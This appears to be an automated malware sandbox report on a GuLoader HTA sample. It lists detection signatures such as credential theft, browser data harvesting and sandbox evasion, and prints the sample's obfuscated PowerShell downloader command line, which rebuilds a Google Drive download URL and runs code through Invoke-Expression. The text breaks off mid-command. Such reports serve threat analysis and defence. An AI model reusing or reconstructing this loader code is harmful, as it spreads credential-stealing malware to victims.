Edit tour
Windows
Analysis Report
orden_0099896754537687897657436786756785654576.hta
Overview
General Information
Detection
GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Check if machine is in data center or colocation facility
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 1004 cmdline:
mshta.exe "C:\Users\ user\Deskt op\orden_0 0998967545 3768789765 7436786756 785654576. hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 1224 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Ungelati nizables = 1;$fostre ne='Substr in';$fostr ene+='g';F unction Sk ftendes($K riminologi en){$Svane hamme54=$K riminologi en.Length- $Ungelatin izables;Fo r($Rusland srejsernes =5; $Rusla ndsrejsern es -lt $Sv anehamme54 ; $Rusland srejsernes +=(6)){$Fo rbudsbeste mmelserne+ =$Kriminol ogien.$fos trene.Invo ke($Ruslan dsrejserne s, $Ungela tinizables );}$Forbud sbestemmel serne;}fun ction bifi lar($Unkne aded){. ($Aaretags ) ($Unknea ded);}$Cap italizable =Skftendes 'PotliMTr ,ceoChiroz Aflb,i .pr rlTraadlSe xboaUnde,/ Sk,lp5Kill i.Terri0 R ger Kolb ( ,picuWildr iHelmen R atidBegy.o GratiwMoth es Quiv Po s.vNF,ereT Prepo rbe 1Angle0B r re.Tandl0T og m; ,ham FilthWUnc oniko,pen disc6Smakk 4 A yn;Lag er Dara,xM a.nm6v.rsh 4canva;Gra ve BlunrUd ovevKry.r: Grema1Giga s2hals 1Fo xes.Roddi0 H gei)Sika t TailsGUn holeDespec rattk Bon noEtuie/Ud gy 2Bauck0 K.ast1I,ko l0 Pr,z0Te rmo1Medle0 nlea1 Ble s FratrF U n.giSlaskr S afe Til mfunculo U de,xToxop/ Sptt1Idri f2.ftgt1 E p t. G sg0 Pert ';$e rgometercy kelen=Skft endes 'For s UCystosS amtie olkr S,ovl-Stin kAFo,urg L e.eeInt,rn BakketChlo r ';$Enebr rets=Skfte ndes 'Inst ihSensitSt rantUnexep Strubs Int e:P,yto/An sva/ Noncd sem.r,ett oiStyrivLb ehjeU.byt. Pole g Bri soR.dioo n dergDrosol PrizeInde x.transcHu sbuo roglm B.ob/Svve fuTen.ncpr ogn?Had ne ,iunixAnti dpEnga,oMo ater Softt Freds=Phyt odInf,roBi ogrwK.ejnn Sand l Eft o Teleaga strdoldsa& Pi.niiReso udG and= i ght1 Ur.na QueriFCoac tW Sept_Cy prabTromsU kun,tR Vi dNStok.XFr .it9Epipit Over.F onc oOpo.yg3 A ntiOStrygO Psyc,2Inve nSRibboR i ntexJivinj DeforlDobb .cSe.mlN T hinKS rti9 .arru Mer .x UdgahGl d.taSynont Svin,bspec . ';$Folio se=Skftend es 'Lydis> Upbr. ';$A aretags=Sk ftendes 'K n gliFlere eNeutrx Az im ';$Lumi narism = S kftendes ' PinnieFeri ec De.thFl efoBagga Vaad% Wort aSagebpRke e,pLandsdP ersoaEnhed t Nonda M. do% Begy\F oldnP emio PrisnIntu roLskedsCo lb.BannuL NonlosSpan giDimme Dr a,e&Unlik& Appe Mode reTutt.c S h,khUdenlo Gangs Dext $St re ';b ifilar (Sk ftendes 'M exic$Reclu gRumerl bo gho A.stbE piotaRverh lSentr:Tru p.B ilcrat ebrelDyarc lCrypto er sinSclereM onit=Dogli (,argicCol asmfactodS mak, phono /AnnsocBug sp Ox da$H ypa LPo.du uPaea m Ka loiTypolnR evera Anti rMineri Mi sasTalemmH jlpe)krges ');bifila r (Skftend es 'z.nev$ FictigUtro sl R,oto S p.gbP,etea Salpl Lys t:MarshzGr i.ao Jvnso Pyj msForu rpDatamo.v nfrrAmbroi ApplfCate ceHemoerIn enophotou .remasTeak e= ldef$Di aluESammen Undive Pi, sbChallrCh emorMidd.e SpidtOutd rsAffix. F r ssSvarsp R,stal.emi miDe.artIa gtt(Brier$ cl glFBusl ioBioryl A ccuiPlagio SublsCorp seAnago)Ly